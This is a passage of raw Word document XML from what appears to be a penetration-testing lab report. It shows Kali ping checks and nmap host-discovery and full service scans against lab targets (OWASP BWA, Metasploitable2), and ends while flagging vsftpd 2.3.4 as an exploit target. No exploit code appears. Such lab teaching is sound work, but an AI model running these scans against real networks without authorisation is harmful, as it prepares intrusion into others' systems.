                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="102" name="Figure 2 - img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8"/>
                          <a:srcRect/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5588000" cy="3143250"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="148825A8" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:spacing w:after="60" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="461956C0" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="260" w:after="60" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Figure 3 — Kali reaches all three targets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5521F0D8" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="20" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Run on: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Kali</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12217A4B" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Shows: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Three successful pings across the host-only network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="295D5156" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t>ping -c2 192.168.56.102</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C060BA8" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t>ping -c2 192.168.56.101</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EFA2DCF" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="80" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t>ping -c2 192.168.56.103</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="8" w:type="dxa"/>
        <w:tblCellMar>
          <w:left w:w="10" w:type="dxa"/>
          <w:right w:w="10" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9000"/>
      </w:tblGrid>
      <w:tr w:rsidR="000D5066" w14:paraId="037443B1" w14:textId="77777777" w:rsidTr="00F237B6">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="999999"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:left w:w="0" w:type="dxa"/>
              <w:right w:w="0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2EBC28C1" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="00F237B6">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="60E008D6" wp14:editId="0DBFEAE3">
                  <wp:extent cx="5588000" cy="3143250"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="103" name="Figure 3 - img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9"/>
                          <a:srcRect/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5588000" cy="3143250"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1E558D08" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:spacing w:after="60" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53103A6E" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:spacing w:before="240" w:after="100" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Part 2 — Reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="309E7597" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="260" w:after="60" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Figure 4 — Discover live hosts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A11DD59" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="20" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Run on: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Kali</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A6581B7" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Shows: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>The live hosts on the segment (saved in 3 formats).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132E0FEB" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t>sn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.56.0/24 -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t>oA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t xml:space="preserve"> evidence/discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="692553F4" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="80" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t>ls -l evidence/</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="8" w:type="dxa"/>
        <w:tblCellMar>
          <w:left w:w="10" w:type="dxa"/>
          <w:right w:w="10" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9000"/>
      </w:tblGrid>
      <w:tr w:rsidR="000D5066" w14:paraId="600CD7AF" w14:textId="77777777" w:rsidTr="00F237B6">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="999999"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:left w:w="0" w:type="dxa"/>
              <w:right w:w="0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5812B093" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="00F237B6">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="16A2C495" wp14:editId="7D5C51DB">
                  <wp:extent cx="5588000" cy="3143250"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="104" name="Figure 4 - img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0"/>
                          <a:srcRect/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5588000" cy="3143250"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="67BB3E12" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:spacing w:after="60" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15492F27" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="260" w:after="60" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Figure 5 — Full scan — OWASP BWA web server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A2B340" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="20" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Run on: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Kali</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C36E0D" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Shows: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Open ports and service versions on the web server, incl. HTTP on 80.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B61AD5B" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="80" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t>sC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
        <w:t xml:space="preserve"> -p- 192.168.56.101</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="8" w:type="dxa"/>
        <w:tblCellMar>
          <w:left w:w="10" w:type="dxa"/>
          <w:right w:w="10" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9000"/>
      </w:tblGrid>
      <w:tr w:rsidR="000D5066" w14:paraId="166CBEFA" w14:textId="77777777" w:rsidTr="00F237B6">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="999999"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="999999"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="999999"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="999999"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:tcMar>
              <w:left w:w="0" w:type="dxa"/>
              <w:right w:w="0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6D446495" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="00F237B6">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="59BD3492" wp14:editId="4A96A22D">
                  <wp:extent cx="4445000" cy="2500312"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="105" name="Figure 5 - img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1"/>
                          <a:srcRect/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4445000" cy="2500312"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="73D390F3" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="00F237B6">
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0FD869B9" wp14:editId="7C5C9BB8">
                  <wp:extent cx="4445000" cy="2500312"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="106" name="Figure 5 - img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2"/>
                          <a:srcRect/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4445000" cy="2500312"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="64E74AAB" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:spacing w:after="60" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="182877C3" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="260" w:after="60" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Figure 6 — Full scan — Metasploitable2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63872E0F" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="20" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Run on: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Kali</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53FED475" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Shows: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Open ports/versions — make sure </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>vsftpd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2.3.4 on port 21 is visible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="722972A1" w14:textId="77777777" w:rsidR="000D5066" w:rsidRDefault="000D5066" w:rsidP="000D5066">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="80" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
